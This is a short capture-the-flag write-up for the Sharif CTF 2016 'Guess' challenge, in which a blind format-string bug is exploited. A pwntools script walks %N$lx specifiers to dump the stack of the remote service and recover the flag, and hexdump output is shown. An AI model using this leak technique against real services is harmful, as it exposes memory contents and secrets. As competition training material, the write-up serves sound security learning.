Sharif CTF 2016: Guess

Sharif CTFは特に暗号問が良かったのですが、私には$1$問も解けませんでした。 pwnはこの問題を含めblind FSAが$3$問出て、悪くはないけどつらかった。

problem

The program has an obvious format-string bug. However the binary is not given.

$ nc ctf.sharif.edu 54517
hoge
Hidden string is at somewhere.
hoge
%p
Hidden string is at somewhere.
0x7fdbed525323
^C

solution

The flag exists on the stack. Use %N$lx, and wait for a wihle.

$ /.a.py
[+] Opening connection to ctf.sharif.edu on port 54517: Done
[*] 00000000  23 f3 a7 3b  bc 7f 00 00                            │#··;│····││
[*] 00000000  a0 07 a8 3b  bc 7f 00 00                            │···;│····││
[*] 00000000  00 4c 7b 3b  bc 7f 00 00                            │·L{;│····││
[*] 00000000  a0 07 a8 3b  bc 7f 00 00                            │···;│····││
[*] 00000000  00 00 00 00  00 00 00 00                            │····│····││
[*] 00000000  48 25 f0 6f  ff 7f 00 00                            │H%·o│····││
[*] 00000000  99 45 45 58  01 00 00 00                            │·EEX│····││
[*] 00000000  25 35 24 30  31 36 6c 78                            │%5$0│16lx││
[*] 00000000  20 25 31 30  24 30 31 36                            │ %10│$016││
[*] 00000000  6c 78 20 25  31 31 24 30                            │lx %│11$0││
[*] 00000000  31 36 6c 78  20 25 31 32                            │16lx│ %12││
[*] 00000000  24 30 31 36  6c 78 0a 00                            │$016│lx··││
[*] 00000000  00 03 40 00  00 00 00 00                            │··@·│····││
[*] 00000000  a8 61 ca 3b  bc 7f 00 00                            │·a·;│····││
[*] 00000000  00 00 00 00  00 00 00 00                            │····│····││
[*] 00000000  60 50 ca 3b  bc 7f 00 00                            │`P·;│····││
...
[*] 00000000  3c 05 64 2d  e3 7f 00 00                            │<·d-│····││
[*] 00000000  a0 fa ec dd  fe 7f 00 00                            │····│····││
[*] 00000000  28 dd 62 2d  e3 7f 00 00                            │(·b-│····││
[*] 00000000  58 ac 63 2d  e3 7f 00 00                            │X·c-│····││
[*] 00000000  53 68 61 72  69 66 43 54                            │Shar│ifCT││
[*] 00000000  46 7b 61 35  64 34 32 38                            │F{a5│d428││
[*] 00000000  36 33 32 63  63 63 37 62                            │632c│cc7b││
[*] 00000000  66 64 33 35  37 63 36 61                            │fd35│7c6a││
[*] 00000000  31 32 38 61  37 38 61 35                            │128a│78a5││
[*] 00000000  38 63 7d 00  e3 7f 00 00                            │8c}·│····││
[*] 00000000  c0 44 bf 2d  e3 7f 00 00                            │·D·-│····││
[*] 00000000  7c 57 9d 2d  e3 7f 00 00                            │|W·-│····││
[*] 00000000  78 ad 63 2d  e3 7f 00 00                            │x·c-│····││
KeyboardInterrupt
[*] Closed connection to ctf.sharif.edu port 54517

implementation

#!/usr/bin/env python2
import itertools
from pwn import * # https://pypi.python.org/pypi/pwntools
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('host', nargs='?', default='ctf.sharif.edu')
parser.add_argument('port', nargs='?', default=54517, type=int)
parser.add_argument('--log-level', default='info')
args = parser.parse_args()
context.log_level = args.log_level

p = remote(args.host, args.port)
for i in itertools.count():
    p.sendline('%%%d$016lx %%%d$016lx %%%d$016lx %%%d$016lx' % (4*i+1, 4*i+2, 4*i+3, 4*i+4))
    p.recvuntil('Hidden string is at somewhere.\n')
    for s in p.recvline().split():
        log.info(fiddling.hexdump(p64(int(s, 16))).splitlines()[0])